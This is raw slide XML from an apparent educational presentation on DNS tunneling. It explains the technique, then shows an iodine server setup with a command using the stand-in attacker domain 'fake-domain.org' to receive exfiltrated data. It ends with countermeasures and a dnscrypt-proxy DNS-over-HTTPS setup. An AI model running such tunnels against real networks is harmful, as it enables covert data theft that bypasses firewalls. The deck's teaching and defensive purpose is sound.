              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>-proxy</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>First, ensure your package list is up to date before installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> apt update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Next, install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Configure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>-proxy for DNS over HTTPS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Edit the configuration file to enable DNS over HTTPS and specify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> provider, such as Cloudflare or Google.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> nano /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt-proxy.toml</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>In the configuration file, update the details under the [sources] section to include your chosen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> provider.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Save your changes and exit the editor by pressing Ctrl + X, then Y to confirm, and Enter to save the filename.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Start and Enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>-proxy Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy service to apply the new configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy starts automatically on boot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> enable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Verify DNS over HTTPS Functionality</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Check the service status to verify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy is running without errors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>systemctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Test DNS resolution to ensure queries are handled through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command: dig @127.0.0.1 example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This command will display the DNS query response, confirming if it's using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> provider, such as Cloudflare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>By following these steps, you can effectively configure and verify DNS over HTTPS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>DoH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>) using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>dnscrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>-proxy on Kali Linux. This setup encrypts DNS traffic, significantly enhancing your privacy and security by ensuring your DNS queries cannot be intercepted or manipulated."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3387844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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>There are some other countermeasures also exist to prevent this attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>1. Monitoring DNS traffic for anomalies:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can actively monitor DNS traffic using specialized tools to detect any unusual patterns or behaviors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This includes looking out for unusually high query rates or repetitive queries to uncommon domains, which might signal DNS tunneling activity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>2. Implementing DNS Security Extensions (DNSSEC):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNSSEC adds layers of security by digitally signing DNS records, ensuring the authenticity and integrity of DNS data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It prevents DNS spoofing attacks and strengthens defenses against DNS tunneling attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>3.Deploying a DNS firewall:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS firewalls are purpose-built to filter and block malicious DNS traffic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They're effective in identifying and halting DNS queries and responses associated with DNS tunneling, thus fortifying network security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>4. Implementing network segmentation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network segmentation involves dividing our network into smaller, isolated parts. This helps to contain any DNS tunneling attacks, making it harder for attackers to move around and keeping our network more secure overall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>5. Blocking DNS queries and responses with encoded data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Utilizing advanced DNS security tools capable of recognizing and blocking DNS queries and responses containing encoded data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This proactive measure prevents attackers from leveraging DNS tunneling for data exfiltration and covert communication purposes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These all strategies collectively enhance our DNS security framework, reducing the risks associated with DNS tunneling and strengthening our overall cyber defenses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN"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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="819365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a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148023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Domain Name System (DNS) is like the phone book of the internet. It translates human-readable domain names (like domain.com) into IP addresses (like 216.3.128.12) that computers use to identify each other on the network. This process is essential for connecting users to websites and online services.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="896351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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>tunneling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> is a technique that uses the Domain Name System (DNS) protocol to transfer data covertly over a network. A DNS tunnel client on a local network sends data encapsulated in DNS queries to a local DNS resolver. These queries appear normal but contain encoded data. DNS Tunnel server decodes these queries, extracting the hidden data. Firewalls often overlook DNS traffic, making it a stealthy method for bypassing network restrictions. This process allows for data transmission even when direct connections are blocked, leveraging DNS infrastructure for covert communication.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0584A200-3E6B-4492-8D87-7229F4EB3E82}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4162385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system architecture illustrates the practical implementation of DNS tunneling, showcasing how data can be covertly transferred using the iodine tool. It involves setting up a DNS server and client within a controlled environment. The server, configured with iodine, listens for DNS requests on a specific IP address and domain name. Meanwhile, the client initiates the DNS tunnel by encoding data into DNS queries sent to the server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4077080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This presentation demonstrates how to perform data stealing using DNS tunneling with the iodine tool.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we’ll walk through setting up the iodine server for DNS tunneling, a technique used to covertly transfer data over DNS. This process involves a few key steps. First, ensure iodine is installed on your system. You can do this by updating your package list with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> apt-get update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, followed by installing iodine using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> apt-get install iodine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Next, to start the iodine server, use the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>iodined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -f -c -P &lt;password&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>domain_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Here's what each part of the command does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Starts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iodined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the foreground for interactive use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Enables control mode, which is useful for monitoring and troubleshooting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>-P &lt;password&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sets a password for the DNS tunnel to secure the communication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>server_ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specifies the IP address the iodine server will use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>domain_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Defines the domain name controlled by the attacker for DNS tunneling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>For example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" err="1"/>
              <a:t>iodined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> -f -c -P password 192.168.1.1 fake-domain.org </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>starts the iodine server with IP address 192.168.1.1, domain name fake-domain.org, and password 'password'. This setup allows the server to receive DNS queries containing exfiltrated data from the client. Next, let's see how we configure the client side for initiating the DNS tunnel.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
